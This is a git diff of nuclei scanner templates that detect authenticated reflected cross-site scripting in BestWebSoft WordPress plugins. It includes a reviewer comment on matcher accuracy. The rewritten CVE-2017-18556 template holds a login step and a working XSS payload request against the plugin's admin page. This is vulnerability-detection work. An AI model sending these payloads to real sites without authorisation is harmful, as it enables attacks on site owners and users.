diff --git a/nuclei-templates/CVE-2017/CVE-2017-18496.yaml b/nuclei-templates/CVE-2017/CVE-2017-18496.yaml index 461e3f4358..9cd3d64dfa 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18496.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: htaccess framework: wordpress publicwww-query: "/wp-content/plugins/htaccess/" - tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4a0a00473045022100d6b357df450ea3ce8267e7d5858292ab2f859867e919bb3f1c9f0f7336d14762022049d5be02e863606e96828d81586d1f1e7027d8c6696d83acaecfc7dea8f04eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18500.yaml b/nuclei-templates/CVE-2017/CVE-2017-18500.yaml index 3066821d40..d1554790f4 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18500.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61153 + epss-percentile: 0.60522 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -26,7 +26,7 @@ info: product: social_buttons_pack framework: wordpress publicwww-query: "/wp-content/plugins/social-buttons-pack/" - tags: cve,cve2017,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated + tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 490a0046304402206fad8425d684cf73a566a7ae1849039963806c20b79e7a1272664ec2e814228b022040814da01be4f898a4d8e5dc8fe265627cc24a7536218014506ab61b8fb084fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f89fb19d15fb08118427dcbbec861334e2869b19a7f7629f950880a2b1a030a402204c072011a5c2993febfb3b7ebae8ee5904fd3f1ab56497f1dbfcdc2b0383083d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18501.yaml b/nuclei-templates/CVE-2017/CVE-2017-18501.yaml index 67744d31b6..7f84a097f0 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18501.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61153 + epss-percentile: 0.60522 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,8 +25,8 @@ info: vendor: bestwebsoft product: social_login framework: wordpress - publicwwww-query: "/wp-content/plugins/social-login-bws/" - tags: cve,cve2017,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated + publicwww-query: "/wp-content/plugins/social-login-bws/" + tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft http: - raw: 
@@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 490a0046304402201e54a7373a231dbc6b2c61a8ad243a4d9ca0cb433f1dc4b7347b72544d68fb730220443ed55483f1ec291954c730eea389973a3d35da03683f37da5cf66bb4997b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afda914e7e9726b246e585b8f4faa2ff861c17837ff01ded7c22cbaf1e4ea39e02205a4ecb7f7af6fbd5809cb254f685cee642439232493671b38962a87dfed0b84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18502.yaml b/nuclei-templates/CVE-2017/CVE-2017-18502.yaml index eb5507e0e6..c6c6d10ba6 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18502.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18502.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61153 + epss-percentile: 0.61251 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: subscriber framework: wordpress publicwww-query: "/wp-content/plugins/subscriber/" - tags: cve,cve2017,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated + tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 4b0a0048304602210092fafdfc4dd231ecc7b9289691d7e12a13007fd6b1a751d0163f3551e35d5ff5022100df598f0081f1033cb1bfb83f06539e67bf280c72d91d7eaea2de4a8aa7622f18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092c0a8a182713b0379f504577e9c0a88d2b686eb80d7625f27f9f20fc3442e0002207e24abadc4512d14c9a97c97f04f2c3ddf76f1344b4e8a945a2d00c0732a9410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2017/CVE-2017-18505.yaml b/nuclei-templates/CVE-2017/CVE-2017-18505.yaml index df66136252..93ddcfad77 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18505.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18505.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18505 cwe-id: CWE-79 epss-score: 0.00163 - epss-percentile: 0.52875 + epss-percentile: 0.51969 cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: twitter_button framework: wordpress publicwww-query: "/wp-content/plugins/twitter-plugin/" - tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 4b0a00483046022100bc88f4d1d8623f96a816c8831fd65cbb3612d92bac3df60ef5a3ce6b521b45950221009117db285be8ec76b3df405135a53c182b0913fce5e9b007cb6ed1d51adc0ffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a1c5828cf67da18081cde718eb3df76029916bef83ff06ee5d51264e37751dc10221008c464e7a9ae6f75aabb858462c3a0fd473bfcf2e3940b8611d895617e2fb7d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18516.yaml b/nuclei-templates/CVE-2017/CVE-2017-18516.yaml index 96e41348b0..bedf2a9ea8 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18516.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18516.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -27,7 +27,7 @@ info: product: linkedin framework: wordpress publicwww-query: "/wp-content/plugins/bws-linkedin/" - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated + tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft http: - raw: @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 490a00463044022064069f010fcabf123b6f0863ca9c3e60a9a52100d0f489ff97d82d4607d320c3022013ef46f3cf5b2291023dacf09d647a35af224cff045f2acafc19b0fea6ffb7e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a4098e76f7a55d8322e7d021a7eb38813ded4ec6d28cf311172d96b63872272c02204aa37545bb0e8ebbd130f622c72698d7d0305c164a9e707c1c013d6bd1b2e961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18517.yaml b/nuclei-templates/CVE-2017/CVE-2017-18517.yaml index f23aaad8e6..590b427a09 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18517.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: pinterest framework: wordpress publicwww-query: /wp-content/plugins/bws-pinterest/ - tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft http: - raw: 
@@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4b0a00483046022100b883b11a83e0a3d4f2d273832e9669171d209deaba087b81f30fa583e235a6e4022100c97ce083a59da8e8e9263d0538ef109cb70fba7e6e42151ff77923cd6a64f0c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18518.yaml b/nuclei-templates/CVE-2017/CVE-2017-18518.yaml index 6aff1da7cd..a6aa60cd0c 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18518.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18518.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,8 +26,8 @@ info: vendor: bestwebsoft product: smtp framework: wordpress - publicwwww-query: /wp-content/plugins/bws-smtp/ - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated + publicwww-query: /wp-content/plugins/bws-smtp/ + tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft http: - raw: @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4a0a00473045022100d983ac0f16be15fbe46e48839a1b228ec23c2ea615ae8e424d67d656d30320f102205ab4a6e65c278a5572b84a65b604466d60814f6ba2f249e241ffbf5e7f48bf33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca4f19febda81cd89ac62f3d319631ca3ba438d5c136b4119a5b590e76b81eb4022100c2f1c4f238b7b72d78dbdcfb3579a60e7abd1c1f1e92f5767756df9efdf59ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2017/CVE-2017-18527.yaml b/nuclei-templates/CVE-2017/CVE-2017-18527.yaml index be8fc9ccf8..b62e90fb9a 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18527.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18527.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: pagination framework: wordpress publicwww-query: "/wp-content/plugins/pagination/" - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated + tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4a0a00473045022100fc223f1704a9c522f2318dee22a7429173bcf18ba1473edf051dd9dcb73c1aa202204de8b86e9b5a903eaab5a4e1f40525e2f9d9f24a64fd7be332e7fb16fb927323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207cd86a94cd8aead4a49bbda3b690bb04c0f1febccfb6785b34b253cbab353f48022100e56e0a7397f05b7b5e043e8bf763fbcaf8ea0f17ab29aeecdf9fe91979b4c422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18528.yaml b/nuclei-templates/CVE-2017/CVE-2017-18528.yaml index 1fab28b746..5e2a3b4028 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18528.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18528.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18528 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:pdf_\&_print:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -25,8 +25,8 @@ info: vendor: bestwebsoft product: pdf_\&_print framework: wordpress - publicewww-query: "/wp-content/plugins/pdf-print/" - tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated + publicwww-query: "/wp-content/plugins/pdf-print/" + tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4b0a00483046022100f8166f1a3b388f0b5651fbf87e735894e771f1296a39c47818bfd43fd41afbff022100ef0e0e38658c8a22c96b2baad3e33ae19e357f4dfa0268dc2f6356bd275a5842:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbd7d8507fd10adffb260fac65763dd3af0450f57124c9588276e948193a1f4a02205120b25ba77cad36eec889f71816330835a4b76d3e08924a6bfea9d372b399f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18529.yaml b/nuclei-templates/CVE-2017/CVE-2017-18529.yaml index 5df2ca6d88..844e663cbb 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18529.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18529.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: promobar framework: wordpress publicwww-query: /wp-content/plugins/promobar/ - tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated + tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft http: - raw: 
@@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a0047304502202383e46f6f863975f310fbd65e19684b7cde72098f9b445a5336bcedb89d870002210083c1981639140e1461cdb1d2bcfd824cce7be3c803a911f3c4e865f76ed989df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c33283fd423db70d402c7fd047dc7bebc3eec4bff361ff9d59d4b1efbf225c3d0220245cae47085cf15e815dc7d291310b1550e49f9eef084e23e11863a4392656f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18530.yaml b/nuclei-templates/CVE-2017/CVE-2017-18530.yaml index d18c1724ff..b51207a43c 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18530.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18530.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18530 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: rating framework: wordpress publicwww-query: "/wp-content/plugins/rating-bws/" - tags: cve,cve2017,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated + tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 4b0a004830460221008f037c9ac14dc5c1cfeb60d249440d0390a033dfffe4efe61bf93221c5e956f9022100bbace21ce4e16a5410267194539f3a9d88cf08c10c88ae292095d061e267c7ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220217ca670c25fd088273af9e902e6a30cf2ca9fa7555a0a0ad608454e147ef75c0220668e31fc705d4ceea309b1449b1311d65e0d07f98813067bb6205352b6e9985d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2017/CVE-2017-18532.yaml b/nuclei-templates/CVE-2017/CVE-2017-18532.yaml index 87ca00870a..f926ec8b94 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18532.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18532.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18532 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: realty framework: wordpress publicwww-query: /wp-content/plugins/realty/ - tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated + tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 490a00463044022010a99fc1d34847aa98c6133ba4075071d7670c4ac258728b216a6fdbd53f17360220077176119539c4fc11818453a98156a95a1424dc3a4d9ee9a1eed552d8a14bd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220370407ad931bf1c297e16c99d3c5c1ca953628677fc94ea86715e3131e2b0233022100f740ab11752605c7ddc1fe1f1c1724858aad10d2b52e78f1f9f4a416290da561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18537.yaml b/nuclei-templates/CVE-2017/CVE-2017-18537.yaml index 2bfc428488..a967010a40 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18537.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -25,8 +25,8 @@ info: vendor: bestwebsoft product: visitors_online framework: wordpress - publicewww-query: "/wp-content/plugins/visitors-online/" - tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated + publicwww-query: "/wp-content/plugins/visitors-online/" + tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4b0a00483046022100c5ae176a3006d4f53c2c32dcd009edd3442cfbb038503f7963b4b7d221b2f9b9022100898fd366888d1facc8994d71084fe73dfda9848f56b39bbc4207e81da84163bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6694c2351da20106780916ead57acded8b3561215bff593cfc360a10dedda34022100c75806459a4114b92d8648e825188a9cbc42ba259aa226de782c73040b0007dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18542.yaml b/nuclei-templates/CVE-2017/CVE-2017-18542.yaml index 5b4642f95e..4dc23667c9 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18542.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00221 - epss-percentile: 0.60064 + epss-percentile: 0.59511 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: zendesk_help_center framework: wordpress publicwww-query: "/wp-content/plugins/zendesk-help-center/" - tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated + tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft http: - raw: 
@@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4a0a00473045022100b1773fa7c64ffa7db3b5aad9999ba1be6f00f279035bf301dd311da245fc0b05022003c432007ef5fe07cdd40f4604f7ecba8c7a66d7bc1a8994560f9e6672fcb49f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f7aefa84c2f74418d8bfda7eaebb599348ddbbfb4c230fcfc56a9b82ccc1b3d022100eeaecc0e672ed38b43954db6259d083cd20eb2535283ec8ac0e9154f6d71d649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18556.yaml b/nuclei-templates/CVE-2017/CVE-2017-18556.yaml index 421c8b973d..0069a24e8b 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18556.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18556.yaml 
@@ -1,24 +1,35 @@ id: CVE-2017-18556 info: - name: The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues. + name: Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting author: luisfelipe146 severity: medium description: | The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.7.1 reference: - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - https://nvd.nist.gov/vuln/detail/CVE-2017-18556 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18556 - https://wordpress.org/plugins/bws-google-analytics/#developers classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-18556 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36245 + cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - tags: cve,cve2017,wordpress,wp-plugin,xss,authenticated + max-request: 3 + vendor: bestwebsoft + product: google_analytics + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-google-analytics/" + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -26,24 +37,19 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(42)%3C/script%3E HTTP/1.1 + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and matchers: - - type: word - part: body - words: - - ">\">All" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google Analytics by BestWebSoft")' + condition: and +# digest: 4a0a00473045022058df345caa79fcc85007be091f7b75d399b7d9f2502995f539f1e3387b69d9e7022100d5f4cc931077b75d81472cc62173979120b245394f458e0e02215ea798ce26bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18557.yaml b/nuclei-templates/CVE-2017/CVE-2017-18557.yaml index aabb992c74..90fa86fe6c 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18557.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18557.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36857 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: google_maps framework: wordpress publicwww-query: "/wp-content/plugins/bws-google-maps/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft http: - raw: 
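Review bot: The rewritten dsl matcher still accepts `body_2` on the marker `>">All` alone, which only shows that the leading `">` of the payload came back unescaped, not that the `<script>alert(document.domain)</script>` part survived; a page that happens to emit `>">All` for another reason would match without a working XSS. Adding one more condition to the `condition: and` set, `- 'contains(body_2, "<script>alert(document.domain)</script>")'`, ties the match to the injected payload now that the payload was changed in this hunk anyway; if the sibling BestWebSoft templates are meant to stay uniform, the same line should go into them in a follow-up. The new third request only confirms `Google Analytics by BestWebSoft` in `readme.txt` and does not compare the version against the 1.7.1 fix stated in `remediation`, so it acts as a product fingerprint rather than a vulnerability check — presumably intended, but worth a comment above the request such as `# readme.txt is fetched only to fingerprint the plugin; the XSS evidence is the reflection in body_2`. The `http` block's `raw` list starts in the previous hunk, so the first request is outside this hunk.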
@@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 4b0a00483046022100d957e1f9517cb376d38598784b9a5992125c36001062b77f6c9693c16062dae6022100e583b2932fca33ca1b832bc010e79ced9ca2fd55ef37e094cfead6e4ef4aa28b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f2ce883ac28fa110099e93debcea93ba72a87c644e7d50eab47ba65b5b0c0010220263c16a96c6d3ee59ee4639403d581676533664e25e9d12ddafed64e9f58a560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18558.yaml b/nuclei-templates/CVE-2017/CVE-2017-18558.yaml index d3be5453b5..ac1987e5ac 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18558.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: testimonials framework: wordpress publicwww-query: "/wp-content/plugins/bws-testimonials/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4a0a004730450221008a5d52c411f963412d93f7039250cf7c1607875907a65b124fa6784e66f19743022053a9b81e0b27fec8da4451b120e46ad144640e66d9268d4948e2e8286fca8e2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008db3605db8249b8d03ef76b687a919f1586b95a60fd71fb15afb8cc74ba152130220371bf249484018debba5b816e27dcf3f7d8fdd724c87788635a6136b1266ef07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
